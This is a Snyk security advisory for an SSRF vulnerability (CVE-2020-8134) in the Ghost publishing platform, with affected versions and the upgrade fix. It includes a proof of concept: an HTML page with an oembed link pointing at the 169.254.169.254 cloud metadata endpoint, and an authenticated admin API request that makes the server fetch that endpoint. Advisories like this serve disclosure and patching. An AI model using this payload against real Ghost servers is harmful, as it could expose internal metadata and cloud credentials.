Server Side Request Forgery (SSRF) Affecting ghost package, versions <2.38.1 >=3.0.0 <3.10.0
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.08% (36th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-GHOST-559536
- published 9 Mar 2020
- disclosed 9 Mar 2020
- credit whoareme
Introduced: 9 Mar 2020
CVE-2020-8134 Open this link in a new tabHow to fix?
Upgrade ghost to version 2.38.1, 3.10.0 or higher.
Overview
ghost is a publishing platform
Affected versions of this package are vulnerable to Server Side Request Forgery (SSRF). The getOembedUrlFromHTML() function does not sanitize user input.
PoC by whoareme
First of all, we should create an HTML page with "link[type="application/json+oembed] malicious URL which we would like to discover:
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Security Testing</title>
<link rel="alternate" type="application/json+oembed" href="http://169.254.169.254/metadata/v1.json"/>
</head>
<body></body>
</html>
And serve this page by the Python SimpleHTTPServer module:
python -m SimpleHTTPServer 8000
Send the following request with publisher Cookies
GET /ghost/api/v3/admin/oembed/?url=http://169.254.169.254/metadata/v1.json&type=embed HTTP/1.1
Host: YOUR_WEBSITE
Connection: keep-alive
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-Ghost-Version: 3.5
App-Pragma: no-cache
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US;
Cookie: ghost-admin-api-session=YOUR_SESSION
References
CVSS Scores
version 3.1